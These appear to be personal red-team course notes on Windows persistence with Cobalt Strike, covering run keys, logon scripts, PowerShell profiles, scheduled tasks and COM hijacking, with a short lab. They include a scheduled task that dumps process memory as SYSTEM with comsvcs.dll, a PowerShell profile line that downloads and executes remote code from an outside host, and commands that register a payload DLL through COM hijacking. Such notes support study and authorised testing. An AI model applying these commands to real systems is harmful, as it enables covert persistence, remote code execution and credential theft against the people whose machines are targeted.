LOLBIN

• schtasks /create /sc minute /mo 30 /tn asd /ru system /rl highest /f /tr "CSIDL_SYSTEM\\rundll32.exe c:\\windows\\system32\\comsvcs.dll, minidump 1020 c:\\users\\defautl\\out.dmp full"
  • Creates task for dumping a process

Cobalt Strike

This chapter will cover the following techniques:

• Registry Run Keys & Startup Folder [T1547.001].

  • HKCU\Software\Microsoft\Windows\CurrentVersion\Run
  • HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
  • reg_set HKCU Software\\Microsoft\\Windows\\CurrentVersion\\Run Updater REG_EXPAND_SZ %LOCALAPPDATA%\\Microsoft\\WindowsApps\\updater.exe
    • reg_set <host:optional> <hive> <key> <value> <type> <data>
  • reg_query to view it
  • Startup folder @ %APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup
  • Delete with reg_del

• Logon Scripts [T1037.001].

  • The HKCU\\Environment registry key contains the user's environment variables, such as %Path% and %TEMP%.  An adversary can add another value to this key called UserInitMprLogonScript [T1037.001].  As with the autorun keys, is this value should contain the path to a program, then it will execute automatically when the user logs in.

• PowerShell Profile [T1546.013].

  • profile.ps1 similar to .bashrc / .bash_profile
  • Microsoft publishes details on where these profiles can be created, e.g. $HOME\\Documents\\WindowsPowerShell\\Profile.ps1
  • If the profile and/or directory doesn't exist, just create it
  • Any code that hangs/blocks will stop from loading the powershell and the user will not be presented with an input prompt until the profile script has finished.
  • Recommended to use Start-Job
    • $_ = Start-Job -ScriptBlock { iex (new-object net.webclient).downloadstring("[<http://bleepincomputer.com/a>](<http://bleepincomputer.com/a>)") }
  • Then upload the profile to the user's WindowsPowerShell directory

• Scheduled Tasks [T1053.005].

  • Linux’s crontab
  • Example XML that triggers when the user logs in

  <Task xmlns="<http://schemas.microsoft.com/windows/2004/02/mit/task>">
    <Triggers>
      <LogonTrigger>
        <Enabled>true</Enabled>
        <UserId>CONTOSO\\pchilds</UserId>
      </LogonTrigger>
    </Triggers>
    <Principals>
      <Principal>
        <UserId>CONTOSO\\pchilds</UserId>
      </Principal>
    </Principals>
    <Settings>
      <AllowStartOnDemand>true</AllowStartOnDemand>
      <Enabled>true</Enabled>
    </Settings>
    <Actions>
      <Exec>
        <Command>%LOCALAPPDATA%\\Microsoft\\WindowsApps\\updater.exe</Command>
      </Exec>
    </Actions>
  </Task>
  

  • In Cobalt Strike just use schtaskscreate \\Beacon XML CREATE
    • Replace Beacon with any name but it must start with \\
    • The task can be deleted using schtasksdelete

• Component Object Model Hijacking [T1546.015].

  • COM Objects are interfaces for programs of different programming languages to use the same libraries

  • Mentality is similar to DLL hijacking

  • Entries can be found in HKEY_CLASSES_ROOT\\CLSID

  • InProcServer32 or LocalServer32 inside those entries point to a DLL or EXE that it “interfaces” to

  • HKEY_CLASSES_ROOT is merged from HKEY_LOCAL_MACHINE\\Software\\Classes and HKEY_CURRENT_USER\\Software\\Classes

  • For standard users, HKCU takes priority

  • If an entry exists for HKLM and not for HKCU, the HKCU entry can be hijacked (similar to search entry of DLL hijacking)

  • Another way is if a COM entry points to a DLL or EXE that doesn't exist on disk, and the location is writable by standard users

  • The trick is to find a COM object that

    • Doesn’t break software or Windows itself
    • Is not called 1000 times

  • Find hijackable COM objects with procmon

  • Add some filters in procmon where:

    • The Operation is RegOpenKey.
    • The Path contains InprocServer32 or LocalServer32.
    • The Result is NAME NOT FOUND.

  • A COM object I've used in the past is one loaded by DllHost.exe (runs when logging in)

  • Check if it exists in HKLM: Get-Item -Path "HKLM:\\Software\\Classes\\CLSID\\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\\InprocServer32" (it exists)

  • Check if it exists in HKCU: Get-Item -Path "HKCU:\\Software\\Classes\\CLSID\\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\\InprocServer32" (it doesn’t exist)

  • Register it for HKCU (under the same CLSID)

    PS C:\\Users\\Attacker> New-Item -Path "HKCU:Software\\Classes\\CLSID" -Name "{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}"
    PS C:\\Users\\Attacker> New-Item -Path "HKCU:Software\\Classes\\CLSID\\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" -Name "InprocServer32" -Value "C:\\Payloads\\http_x64.dll"
    PS C:\\Users\\Attacker> New-ItemProperty -Path "HKCU:Software\\Classes\\CLSID\\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\\InprocServer32" -Name "ThreadingModel" -Value "Both"
    

LAB

1. Find that ms-teams has a COM hijack issue through procmon
2. Test it by registering the HKCU InprocServer32 entry with the specific CLSID found in procmon
3. It works, so in the victim computer we upload a dll, we blend it and register the key (similarly with registering run keys) with: reg_set HKCU “Software\\Classes\\CLSID\\{CLSID}\\InprocServer32” “” REG_EXPAND_SZ “PATH_OF_DLL” and also set the threading model reg_set HKCU “Software\\Classes\\CLSID\\{CLSID}\\InprocServer32” “ThreadingModel” REG_SZ “Both”

So, for COM hijacking first find the hijackable COM object, then set it by registering it with reg_set

Lab Test

1. Will the reg_set work on the first as well?
2. Will the New-Item work on the attacker’s machine as well?